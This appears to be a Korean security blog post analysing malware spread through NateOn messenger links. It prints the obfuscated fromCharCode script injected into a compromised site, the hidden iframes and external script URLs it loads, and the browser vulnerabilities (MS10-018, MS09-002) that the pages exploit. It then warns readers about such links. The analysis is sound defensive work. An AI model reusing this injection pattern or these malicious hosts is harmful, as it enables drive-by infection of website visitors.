본문 바로가기

security/악성코드 유포

계속 활동하고있는 네이트온 악성코드 !!




네이트온 악성코드는 기존의 바로 받는 방식이었지만 지금은 다양하게 유포되고 있습니다. 최근에 따라 이렇게 보여지고 있으므로 글로 남겨 봅니다. 어제 받은 네이트온 악성코드 쪽지 입니다. 링크를 클릭시 기존에는 바로 다운로드 링크로 넘어갔지만 지금은 그 사이트 안에 코드삽입을 해놓으므로 악성코드를 감염시키는 역활을 합니다 !

위 사이트를 들어간다면 악성코드 스크립트가 그대로 다음과 같은 방식으로 삽입되어 있습니다.

 [원본 소스]
<SCRIPT>document.write(String.fromCharCode(60,105,102,114,97,109,101,32,(생략)61,110,111,62,60,47,105,102,114,97,109,101,62)); </script><!--

이 스트립트를 실행시키면 다음과 같습니다.

[스크립트 실행 후]

<iframe frameborder=0 src=http://www.dicadong.net/exxy/data/xxxx/top.html width=100 height=1 scrolling=no></iframe>


이와 같이 한 사이트로 연결이 되어 있습니다. 이 링크를 따라 들어가보면 한 사이트의 로그인 페이지가 나오게 됩니다...


사이트가 이와 같이 백지인 상태입니다... 분명 안에 소스에는 무언가가 있으니 이렇게 뜨는거 겠지요?? 소스를 확인해 보지요 ...

<!-- <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> -->
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=euc-kr">
<title>로그인</title>
<link rel="stylesheet" href="../style.css" type="text/css">
</head>

<body topmargin="0" leftmargin="0" >
<!-- 새창 대신 사용하는 iframe -->
<iframe frameborder=0 src=main.html width=100 height=10 scrolling=no></iframe>
<script type="text/javascript" src="in.js"></script>
<script type="text/javascript" src="
http://www.npcn.or.kr/xxxx/data/pds03/ajax.js"></script>
</body>
</html>


역시 안에는 이런식으로 연결되는 곳들이 4개나 보이는군요 !!
이중 역시 중요한 main.html 로 들어가 볼까요??
역시 지난번과 마찬가지로 아스키코드로 이루어진 함수로 되어있는 코드가 이와같이 보입니다.

var ss =Array(60,105,102,114,97,109,101,32,[생략],111,62,60,47,105,102,114,97,109,101,62); 

var ss2 =Array(60,105,102,114,97,109,101,32,[생략],97,109,60,47,105,102,114,97,109,101,62);

이것들을 다시 함수를 통해 해독하면 다음과 같이 연결 됩니다.
제가 사용한 함수 값은 지난번 글에서 확인 할 수 있습니다.

네이트온에서 새로운 형태로 유포되는 악성코드 !!

<iframe frameborder=0 src=kr1.html width=100 height=1 scrolling=no></iframe>
<iframe frameborder=0 src=kr2.html width=100 height=1 scrolling=no></iframe>


kr1.html = var aa4=(aaa4.replace(/WP/g,"%u")); 
kr2.html = var aa4=(aaa4.replace(/WP/g,"%u"));

코드를 이와같이 리플레이스 해준다면 최종파일에 접근하는건 그리 어렵지 않겠지요??

지난번과 같이 이용한 취약점은 다음과 같이 이용 되었습니다.

kr1.html : MS10-018

kr2.html : MS09-002, CVE-2009-0075

[바이러스 토탈]

top.html : http://www.virustotal.com/file-scan/report.html?id=f4bf6e1b1caa582415bd73a4996e1af2eb5ab3dc3ba68934bd5344be53102264-1295767742

main.html : http://www.virustotal.com/file-scan/report.html?id=ef630f804950d54ff43be66c7060672b96d4a68d6d5dd8557a42e1a691c1a9b7-1295767748


kr1.html : http://www.virustotal.com/file-scan/report.html?id=5bb897af56a3454b61dabe77eb0639269d94e4d396ecd997f57e671223317b2f-1295767749

kr2.html : http://www.virustotal.com/file-scan/report.html?id=f6ce395d5914276aaa6681a17bf1bcbfbbaffcf63bb84d51816987bf5d7a29e3-1295767848

최종 파일 : 38.jpg : http://www.virustotal.com/file-scan/report.html?id=816289ed36d548488b278356249cc34e88fe47862d1b9100769122ad024f0c6b-1295767989


네이트온이나 메신져 상에서 불 필요한 쪽지는 열어보지도 말고 실행하지도 말고 클릭해보지도 맙시다 !!

이전글 :
네이트온에서 새로운 형태로 유포되는 악성코드 !!